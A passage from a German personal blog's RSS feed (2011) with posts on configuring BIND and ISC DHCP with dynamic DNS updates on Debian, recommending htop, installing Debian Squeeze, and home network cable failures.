&lt;p&gt;zone &amp;#8220;example.org&amp;#8221; {&lt;br /&gt;&amp;#160; type master;&lt;br /&gt;&amp;#160; file &amp;#8220;/var/lib/bind/zone.example.org&amp;#8221;;&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;zone &amp;#8220;0.0.10.in-addr.arpa&amp;#8221; {&lt;br /&gt;&amp;#160; type master;&lt;br /&gt;&amp;#160; file &amp;#8220;/var/lib/bind/zone.10.0.0&amp;#8221;;&lt;br /&gt;};&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;p&gt;Nach einem Reload der Zonen (&lt;code&gt;rndc reload&lt;/code&gt;) sollte die Auflösung vor- und rückwärts funktionieren, was man mit &lt;code&gt;host laptop1.example.org&lt;/code&gt; und dann mit &lt;code&gt;host 10.0.0.21&lt;/code&gt; testen kann.&lt;/p&gt; 
&lt;h3&gt;2. Installation und Einrichtung des DHCP-Servers&lt;/h3&gt; 
&lt;p&gt;&lt;code&gt;aptitude -r install isc-dhcp-server&lt;/code&gt;&lt;/p&gt; 
&lt;p&gt;Nun ist &lt;em&gt;/etc/dhcp/dhcpd.conf&lt;/em&gt; (ggf. nach Sicherung der Originaldatei) anzupassen:&lt;/p&gt; 
&lt;blockquote&gt; 
&lt;p&gt;server-name Server;&lt;br /&gt;&lt;br /&gt;option domain-name &amp;#8220;example.org&amp;#8221;;&lt;br /&gt;option subnet-mask 255.255.255.0;&lt;br /&gt;option domain-name-servers 10.0.0.1; &lt;em&gt;# der oder die DNS-Server&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;default-lease-time 86400; &lt;em&gt;# 24 h&lt;/em&gt;&lt;br /&gt;max-lease-time 172800;&amp;#160;&amp;#160;&amp;#160; &lt;em&gt;# 48 h&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;authoritative;&lt;/p&gt; 
&lt;p&gt;ignore client-updates;&lt;br /&gt;&lt;br /&gt;subnet 10.0.0.0 netmask 255.255.255.0 {&lt;br /&gt;&amp;#160; range 10.0.0.101 10.0.0.199; &lt;em&gt;# DHCP-Adressen werden zwischen .101 und .199 vergeben&lt;/em&gt;&lt;br /&gt;&amp;#160; option broadcast-address 10.0.0.255;&lt;br /&gt;&amp;#160; option routers 10.0.0.200; &lt;em&gt;# das Gateway ins Internet, bspw. der DSL-Router&lt;/em&gt;&lt;br /&gt;}&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;p&gt;Das genügt zunächst einmal; nach einem &lt;code&gt;/etc/init.d/isc-dhcp-server restart&lt;/code&gt; sollte der DHCP-Dienst funktionieren und IP-Adressen zwischen 10.0.0.101 und 10.0.0.199 vergeben. Die vergebenen Adressen lassen sich unter &lt;em&gt;/var/lib/dhcp/dhcpd.leases&lt;/em&gt; ersehen.&lt;/p&gt; 
&lt;p&gt;Im Logfile (standardmäßig &lt;em&gt;/var/log/daemon.log&lt;/em&gt;) kann man die Vergabe der Leases verfolgen; dort ersieht man auch die MAC-Adressen der Hosts, die sich per DHCP Adressen holen. Mit Hilfe dieser MAC-Adressen kann man dann den Hosts, die feste Adressen per DHCP vergeben erhalten sollen (im Beispiel sind das &lt;em&gt;desktop&lt;/em&gt;, &lt;em&gt;laptop1&lt;/em&gt; und &lt;em&gt;laptop2&lt;/em&gt;), ebensolche zuweisen. Nehmen wir an, &lt;em&gt;desktop &lt;/em&gt;hat die MAC-Adresse &lt;em&gt;00:30:05:5a:db:a0&lt;/em&gt;, dann müßte der entsprechende Eintrag in der &lt;em&gt;/etc/dhcp/dhcpd.conf &lt;/em&gt;folgendermaßen lauten:&lt;/p&gt; 
&lt;blockquote&gt; 
&lt;p&gt;host desktop {&lt;br /&gt;&amp;#160; hardware ethernet 00:30:05:5a:db:a0;&lt;br /&gt;&amp;#160; fixed-address 10.0.0.11;&lt;br /&gt;}&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;p&gt;Nach einem erneuten Restart des DHCP-Servers wird &lt;em&gt;desktop&lt;/em&gt; jetzt immer fest diese DHCP-Adresse zugewiesen bekommen.&lt;/p&gt; 
&lt;h3&gt;3. Dynamische Aktualisierung der DNS-Zonen&lt;/h3&gt; 
&lt;p&gt;Der letzte Schritt sorgt jetzt dafür, daß durch den DHCP-Server dynamisch vergebene Adressen (10.0.0.101-199) in den Zonen-Dateien des Nameservers mit dem entsprechenden Namen erfasst werden. Diese Updates kann man entweder durch jedes Programm, das auf dem Server läuft, erlauben, oder kryptographisch absichern. Ich stelle hier ersteres dar.&lt;br /&gt;&lt;/p&gt; 
&lt;p&gt;Die Konfiguration des DNS-Servers in &lt;em&gt;/etc/bind/named.conf.local&lt;/em&gt; ist folgendermaßen zu ergänzen (fettgedruckt):&lt;/p&gt; 
&lt;blockquote&gt;
&lt;p&gt;zone &amp;#8220;example.org&amp;#8221; {&lt;br /&gt;&amp;#160; type master;&lt;br /&gt;&amp;#160; file &amp;#8220;/var/lib/bind/zone.example.org&amp;#8221;;&lt;br /&gt; &lt;strong&gt;allow-update { localhost; };&lt;/strong&gt;&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;zone &amp;#8220;0.0.10.in-addr.arpa&amp;#8221; {&lt;br /&gt;&amp;#160; type master;&lt;br /&gt;&amp;#160; file &amp;#8220;/var/lib/bind/zone.10.0.0&amp;#8221;;&lt;br /&gt; &lt;strong&gt;allow-update { localhost; };&lt;/strong&gt;&lt;br /&gt;};&lt;/p&gt;
&lt;/blockquote&gt; 
&lt;p&gt;Reloaden der Konfiguration nicht vergessen! &lt;br /&gt;&lt;/p&gt; 
&lt;p&gt;Die Konfiguration des DHCP-Servers in &lt;em&gt;/etc/dhcp/dhcpd.conf&lt;/em&gt; ist folgendermaßen zu ergänzen (fettgedruckt):&lt;/p&gt; 
&lt;blockquote&gt; 
&lt;p&gt;[...]&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;ddns-update-style interim;&lt;br /&gt;&lt;/strong&gt;ignore client-updates;&lt;br /&gt;&lt;br /&gt;subnet 10.0.0.0 netmask 255.255.255.0 {&lt;br /&gt;&amp;#160; range 10.0.0.101 10.0.0.199; # DHCP-Adressen werden zwischen .101 und .199 vergeben&lt;br /&gt;&amp;#160; option broadcast-address 10.0.0.255;&lt;br /&gt;&amp;#160; option routers 10.0.0.200; # das Gateway ins Internet, bspw. der DSL-Router&lt;br /&gt;&lt;strong&gt;&amp;#160; ddns-domainname &amp;#8220;gast.example.org&amp;#8221;;&lt;br /&gt;&lt;br /&gt;&amp;#160; zone example.org. {&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; primary 127.0.0.1;&lt;br /&gt;&amp;#160; }&lt;br /&gt;&lt;br /&gt;&amp;#160; zone 0.0.10.in-addr.arpa. {&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160; primary 127.0.0.1;&lt;br /&gt;&amp;#160; }&lt;/strong&gt;&lt;br /&gt;}&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;p&gt;Restart des DHCP-Servers nicht vergessen!&lt;/p&gt; 
&lt;p&gt;Nunmehr wird die Maschine, die sich - bspw. - als &lt;em&gt;gastnetbook&lt;/em&gt; meldet und eine IP möchtet, bspw. die IP &lt;em&gt;10.0.0.105&lt;/em&gt; zugewiesen bekommen; in die Nameserver-Zonen werden jetzt entsprechende Einträge für &lt;em&gt;10.0.0.105&lt;/em&gt; und &lt;em&gt;gastnetbook.gast.example.org&lt;/em&gt; vorgenommen. Das erfolgt zunächst in Dateien, die den Namen der jeweiligen Zone plus die Endung &amp;#8220;.jnl&amp;#8221; (für &amp;#8220;Journal&amp;#8221;) tragen; regelmäßig werden aber auch die Zonendateien aktualisiert.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Manuelle Änderungen der DNS-Zonen dürfen dann nicht mehr ohne weiteres vorgenommen werden!&lt;/strong&gt; Zunächst müssen die dynamischen Updates unterbrochen werden, danach kann man Änderungen vornehmen und die dynamischen Updates wieder starten:&lt;/p&gt; 
&lt;blockquote&gt; 
&lt;p&gt;rndc freeze example.org&lt;br /&gt;vim /var/lib/bind/zone.example.org&lt;br /&gt;rndc thaw example.org&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;p&gt;oder&lt;/p&gt; 
&lt;blockquote&gt; 
&lt;p&gt;rndc freeze 0.0.10.in-addr.arpa &lt;br /&gt;
vim /var/lib/bind/zone.10.0.0&lt;br /&gt;
rndc thaw 0.0.10.in-addr.arpa &lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;p&gt;&lt;br /&gt;&lt;/p&gt; 
    </content:encoded>

    <pubDate>Fri, 21 Jan 2011 19:46:00 +0100</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1666-guid.html</guid>
    <category>anleitung</category>
<category>debian</category>
<category>dhcp</category>
<category>dns</category>
<category>linux</category>
<category>squeeze</category>

</item>
<item>
    <title>top ist gut, htop ist besser</title>
    <link>http://th-h.de/blog/archives/1662-top-ist-gut,-htop-ist-besser.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>http://th-h.de/blog/archives/1662-top-ist-gut,-htop-ist-besser.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1662</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1662</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;Bereits vor einiger Zeit hat mir das &lt;em&gt;Bravszaf&lt;/em&gt; &lt;a title=&quot;htop bei sourceforge.net&quot; href=&quot;http://th-h.de/blog/exit.php?url_id=1753&amp;amp;entry_id=1662&quot;  onmouseover=&quot;window.status=&#039;http://htop.sourceforge.net/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;&lt;strong&gt;htop&lt;/strong&gt;&lt;/a&gt; empfohlen, eine &lt;del&gt;graphische&lt;/del&gt;farbige Version des bekannten &lt;em&gt;process viewers&lt;/em&gt; &lt;strong&gt;top&lt;/strong&gt;, der die auf einem System laufenden Prozesse und weitere Informationen über die Ressourcenauslastung anzeigt. Inzwischen habe ich das auf mehreren Maschinen getestet und bin durchaus positiv beeindruckt.&lt;/p&gt; 
&lt;p&gt;Tip: Einfach mal ausprobieren.&lt;br /&gt;&lt;/p&gt;  
    </content:encoded>

    <pubDate>Fri, 21 Jan 2011 14:53:00 +0100</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1662-guid.html</guid>
    <category>htop</category>
<category>linux</category>

</item>
<item>
    <title>Installation von Debian Squeeze</title>
    <link>http://th-h.de/blog/archives/1665-Installation-von-Debian-Squeeze.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>http://th-h.de/blog/archives/1665-Installation-von-Debian-Squeeze.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1665</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1665</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;Gestern schrieb ich schon, daß ich mal wieder wahrlich &lt;a title=&quot;Erledigungen, Erledigungen, nicht als Erledigungen ...&quot; href=&quot;http://th-h.de/blog/archives/1663-Erledigungen,-Erledigungen,-nicht-als-Erledigungen-....html&quot;&gt;zu nichts komme&lt;/a&gt; (jedenfalls nicht zu den Sachen, die ich mir vorgenommen hatte) - daher mußte bislang auch die Einrichtung des &lt;a title=&quot;Ein neuer Homeserver&quot; href=&quot;http://th-h.de/blog/archives/1664-Ein-neuer-Homeserver.html&quot;&gt;neuen Rechners&lt;/a&gt; (die ich eigentlich in der ersten Woche des neuen Jahres abzuschließen hoffte) zurückstehen. Heute habe ich damit aber dann einmal - mit Unterstützung aus dem IRC - angefangen und ein &lt;strong&gt;Debian Squeeze&lt;/strong&gt; (dessen Release ja unmittelbar bevorsteht) installiert. Da die Maschine per KVM-Switch an Monitor, Tastatur und Maus hängt, habe ich mich mittlerweile entschlossen, sie nicht nur als Server, sondern auch als Desktop zu nutzen, auch um einmal ein Gefühl dafür zu bekommen, wie sich ein Linux auf dem Desktop so anfühlt - denn obschon ich seit gut 10 Jahren mit Linux als Server-OS umgehen, arbeite ich auf dem Desktop immer noch unter Windows (zunehmend ergänzt um Tools aus der unixoiden Welt).&lt;/p&gt; 
&lt;p&gt;Aufgrund meiner bisher mangelnden Erfahrung mit der Installation eines Systems (ich kenne den Arbeitsgang in der Regel erst beginnend mit der Anpassung eines vom Provider aufgespielten Images und habe Erfahrung im wesentlichen mit dem Zugang via SSH, nicht mit der Arbeit an der Konsole ...) und der Tatsache, daß Debian für das bevorstehende Release alle nicht-freie Firmware aus dem &lt;em&gt;main&lt;/em&gt;-Archiv entfernt hat, befürchtete ich erhebliche Probleme, schließlich sind mir aus den vorgenannten Gründen im weitesten Sinne hardwarenahe Arbeiten (Treiber, Kernel, Partitionierung von Platten, Auswahl des Filesystems und Einrichtung von RAID, LVM und Co.) nicht wirklich vertraut. Der Ablauf erwies sich aber als angenehm einfach.&lt;/p&gt; 
&lt;p&gt;Nach dem &lt;a title=&quot;debian-installer&quot; href=&quot;http://th-h.de/blog/exit.php?url_id=1764&amp;amp;entry_id=1665&quot;  onmouseover=&quot;window.status=&#039;http://www.debian.org/devel/debian-installer/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Herunterladen&lt;/a&gt; eines Netinstall-Images aus den täglichen Snapshots und dessen Brennen auf CD wurde mir nach dem Boot angeboten, den graphischen oder den konsolenorientierten Installer zu starten, wobei ich mich für letzteres entschied; danach wurde ich durch die Ersteinrichtung geführt, bis ... tatsächlich eine fehlende Firmware (&lt;em&gt;rtl8168d-1.fw&lt;/em&gt;) gefunden wurde, sinnigerweise ausgerechnet für die (Realtek-)Netzwerkkarte (ohne die sich ein Netinstall dann vermutlich nicht so richtig erfolgreich gestalten dürfte). Glücklicherweise hatte ich mich bereits vorher informiert, wo Debian die nicht-freie Firmware jetzt versteckt hat, so daß ich den entsprechen &lt;a href=&quot;http://th-h.de/blog/exit.php?url_id=1765&amp;amp;entry_id=1665&quot; title=&quot;http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/squeeze/current/&quot;  onmouseover=&quot;window.status=&#039;http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/squeeze/current/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Tarball&lt;/a&gt; herunterladen und via USB-Stick bereitstellen konnte. Das half aber nicht; weder der Tarball noch die ausgepackten Debs konnten den Installer glücklich machen. Weitere Suche mit dem Namen der vermißten Firmware führte dann zu einem &lt;a href=&quot;http://th-h.de/blog/exit.php?url_id=1766&amp;amp;entry_id=1665&quot; title=&quot;http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=609388&quot;  onmouseover=&quot;window.status=&#039;http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=609388&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Bugreport&lt;/a&gt; und dem entsprechenden &lt;a href=&quot;http://th-h.de/blog/exit.php?url_id=1767&amp;amp;entry_id=1665&quot; title=&quot;http://packages.debian.org/sid/firmware-realtek&quot;  onmouseover=&quot;window.status=&#039;http://packages.debian.org/sid/firmware-realtek&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Firmware-Paket&lt;/a&gt; mit Realtek-Firmware; ich habe dann entsprechend das dort verlinkte Tar-Archiv heruntergeladen, ausgepackt und - nach mehreren erfolglosen Versuchen - die Realtek-Firmware in das Root-Verzeichnis des USB-Sticks gepackt. Jetzt war der Installer glücklich.&lt;/p&gt; 
&lt;p&gt;Im weiteren Verlauf gelang es mir allerdings dennoch nicht, eine Netzwerkverbindung aufzubauen, was die weitere Installation etwas hinderte, insbesondere soweit Repositories eingebunden und Sicherheitsupdates geladen werden sollte; nach deren Abschluss und einem Reboot war jedoch eine Netzwerkverbindung vorhanden. Hilfreich für den absoluten Anfänger &lt;em&gt;*hüstel*&lt;/em&gt; ist es übrigens in solchen Fällen zu wissen, daß man mit Alt-4 ein Terminal mit den Logs und Fehlermeldungen angezeigt bekommt, mit Alt-1 wieder zurückkomt und ggf. auf einem der anderen TTYs eine Shell starten kann. &lt;a href=&quot;http://th-h.de/blog/exit.php?url_id=1768&amp;amp;entry_id=1665&quot; title=&quot;http://www.debian.org/releases/squeeze/amd64/ch06s01.html.en&quot;  onmouseover=&quot;window.status=&#039;http://www.debian.org/releases/squeeze/amd64/ch06s01.html.en&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Dokumentiert&lt;/a&gt; ist das im &lt;a href=&quot;http://th-h.de/blog/exit.php?url_id=1769&amp;amp;entry_id=1665&quot; title=&quot;http://www.debian.org/releases/squeeze/amd64/&quot;  onmouseover=&quot;window.status=&#039;http://www.debian.org/releases/squeeze/amd64/&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Install-Manual&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;[&lt;strong&gt;Update vom 23.01.2011:&lt;/strong&gt; Offenbar handelt es sich bei dem Problem mit der Firmware für die Realtek-Netzwerkkarte noch um einen Bug, der mit dem ersten Point-Release behoben werden soll - sowohl hinsichtlich der Probleme des Installers, die Firmware auf dem USB-Stick zu finden, als auch hinsichtlich der fehlenden Netzwerkkonnektivität nach dem Finden der Firmware.]&lt;/em&gt;&lt;br /&gt;&lt;/p&gt; 
&lt;p&gt;Der Rest der Installation bis zum ersten Reboot verlief ereignislos, gut unterstützt und dokumentiert - es gelang mir auch auf Anhieb (naja, mit einigen Versuchen), aus meinen beiden Festplatten ein RAID 1 (mit gesonderter Bootpartition) zu erstellen, darüber LVM zu legen, die einzelnen &lt;em&gt;Logical Volumes&lt;/em&gt; anzulegen und zu formatieren, ohne daß ich (abgesehen von Hinweisen zu der grundsätzlichen Auswahl des Filesystems und der Partitionierung) irgendeine Unterstützung via IRC gebraucht hätte.&lt;br /&gt;&lt;/p&gt; &lt;p&gt;Nach dem Reboot saß ich dann zum ersten Mal vor einer graphischen 
Konsole mit Gnome - und ich muß sagen, das gefällt mir bisher gut. &lt;img src=&quot;http://th-h.de/blog/templates/default/img/emoticons/smile.png&quot; alt=&quot;:-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt; 
Momentan muß ich mich dort noch zurechtfinden, aber immerhin kann die 
Maschine schonmal MP3s abspielen (nächster Eintrag auf der ToDo-Liste: 
Musikbibliothek mit korrekten MP3-Tags versehen ... &lt;em&gt;*seufz*&lt;/em&gt;).&lt;/p&gt; 
&lt;p&gt;Auch der Weg dorthin war allerdings nicht ganz ohne Probleme, denn ich mußte
 dem System noch beibringen, die On-Board-Soundkarte richtig 
anzusteuern. Insoweit hilfreich war nach längerem Googeln - wie gesagt, 
bei solchen Dingen war ich bislang völlig ahnungslos - ein Eintrag im &lt;a href=&quot;http://th-h.de/blog/exit.php?url_id=1770&amp;amp;entry_id=1665&quot; title=&quot;http://wiki.ubuntuusers.de/Soundkarten_konfigurieren/HDA&quot;  onmouseover=&quot;window.status=&#039;http://wiki.ubuntuusers.de/Soundkarten_konfigurieren/HDA&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Ubuntuusers-Wiki&lt;/a&gt;, dem ich die Lösung für mein Problem entnehmen konnte: die Datei &lt;em&gt;/etc/modprobe.d/alsa-base.conf&lt;/em&gt; möchte um den Eintrag &lt;em&gt;options snd-hda-intel model=auto&lt;/em&gt; ergänzt werden. Statt dem dort empfohlenen Reboot (das erschien mir so ... Windows-artig) habe ich mich dann auf ein modprobe snd-hda-intel beschränkt - und auch das hat genügt. &lt;img src=&quot;http://th-h.de/blog/templates/default/img/emoticons/smile.png&quot; alt=&quot;:-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt;&lt;/p&gt; 
&lt;p&gt;Jetzt
 muß &amp;#8220;nur noch&amp;#8221; alles eingerichtet werden - insbesondere deshalb 
bestimmt ein großer Spaß, weil ich nach dem Einrichten des Basis-Systems
 den Fehler gemacht hatte, die zu installierenden weiteren Pakete mittels &lt;em&gt;tasksel&lt;/em&gt; auszuwählen. Für den Desktop, von dem ich bekanntlich keine Ahnung habe, mag
 das noch eine gute Idee gewesen sein, aber der Rest - Mailserver, 
Webserver, Datenbankserver, ... - entspricht nun wirklich gar nicht 
meinen (teilweise sicherlich speziellen) Vorstellungen. Also werde ich 
das in den nächsten Tagen einfach neu machen. &lt;img src=&quot;http://th-h.de/blog/templates/default/img/emoticons/wink.png&quot; alt=&quot;;-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt;&lt;/p&gt; 
&lt;p&gt;Insgesamt muß ich sagen, daß meine erste Debian-Installation (auf aktueller Hardware) mich sehr positiv überrascht hat.&lt;/p&gt;
&lt;p&gt;Der
 einzige Punkt, bei dem ich mir mehr Dokumentation gewünscht hätte, war 
die richtige Vorgehensweise, um dem Installer die fehlende Firmware 
unterzuschieben. Schön zu wissen, daß man sich .debs herunterladen (die 
dem Installer aber AFAIS nicht helfen, also nur für Updates hilfreich 
sein dürften) oder die notwendige Firmware &amp;#8220;bspw. via USB-Stick&amp;#8221; 
bereitgestellt werden kann; noch schöner wäre aber zu erläutern, wo und 
wie man ggf. die einzelnen Firmware-Dateien findet und wo genau auf dem 
Stick sie dann bereitgestellt werden sollen. (Vielleicht habe ich die 
entsprechende Doku einfach nicht gefunden, das glaube ich in diesem Fall
 aber noch nicht einmal.) Der Kampf mit der Soundkarte dürfte hingegen 
für jemanden, der so ungefähr weiß, was er tut, nicht problematisch 
sein; die Anleitung im Ubuntuusers-Wiki ist auch völlig hinreichend. (Ob
 man sie aus der Installationsanleitung verlinken sollte, sei 
dahingestellt; ich habe, ehrlich gesagt, nicht einmal nachgeschaut, ob 
das nicht vielleicht sogar der Fall ist.)&lt;/p&gt;
&lt;p&gt; &lt;em&gt;[&lt;strong&gt;Update vom 23.01.2011:&lt;/strong&gt; Vermutlich ist die Doku über das Bereitstellen zusätzlicher Firmware völlig korrekt und das Problem besteht im Installer bzw. dem konkreten Firmware-Paket. Siehe dazu auch die Errata-Seite des Debian-Installers.]&lt;/em&gt;&lt;/p&gt; 
    </content:encoded>

    <pubDate>Thu, 20 Jan 2011 22:47:00 +0100</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1665-guid.html</guid>
    <category>debian</category>
<category>linux</category>
<category>squeeze</category>

</item>
<item>
    <title>New year, same sh*t</title>
    <link>http://th-h.de/blog/archives/1657-New-year,-same-sht.html</link>
            <category>Bits'n'Bytes</category>
            <category>Unmut</category>
    
    <comments>http://th-h.de/blog/archives/1657-New-year,-same-sht.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1657</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1657</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;Letztes Jahr hatte mich am Abend des letzten Urlaubstag ein &lt;a href=&quot;http://th-h.de/blog/archives/1500-Manchmal-ist-es-wie-verhext.html&quot; title=&quot;Manchmal ist es wie verhext&quot;&gt;Ausfall&lt;/a&gt; meines heimischen Servers erwischt; Ursache war ein &lt;a href=&quot;http://th-h.de/blog/archives/1501-Heureka,-das-Netz-ist-da!.html&quot; title=&quot;Heureka, das Netz ist da!&quot;&gt;Defekt des Netzwerkkabels&lt;/a&gt;, das vor Zeiten einmal der Einfachheit halber über den Dachboden verlegt worden war. Ursache unklar, obwohl aus meiner Sicht bereits damals schon viel für den Einzug eines &lt;a href=&quot;http://th-h.de/blog/exit.php?url_id=1751&amp;amp;entry_id=1657&quot;  onmouseover=&quot;window.status=&#039;http://de.wikipedia.org/wiki/Steinmarder&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Mitbewohners&lt;/a&gt; dort oben und dessen Verantwortlichkeit gesprochen hat. Danach ist die Sache etwas im Sande verlaufen.&lt;/p&gt;
&lt;p&gt;Gelöst ist das Problem aber offensichtlich nicht, denn was auch immer die Ursache ist, sie breitet sich aus: seit heute hat auch mein dort noch vorhandener Desktoprechner kein Netz mehr. Auch dort liegt&amp;#8217;s am Netzwerkkabel. Mag ja sein, daß die Kabel damals vor gut 10 Jahren einfach schlecht verlegt wurden und nun allmählich ausfallen, aber irgendwie mag ich daran als Ursache nicht so recht glauben ... Ärgerlich ist&amp;#8217;s ursachenunabhängig allemal, vor allem, weil dort oben auch die Telefonkabel verlegt sind. Nun denn, we&amp;#8217;ll see.&lt;br /&gt;&lt;/p&gt;  
    </content:encoded>

    <pubDate>Mon, 17 Jan 2011 17:13:00 +0100</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1657-guid.html</guid>
    
</item>

</channel>
</rss>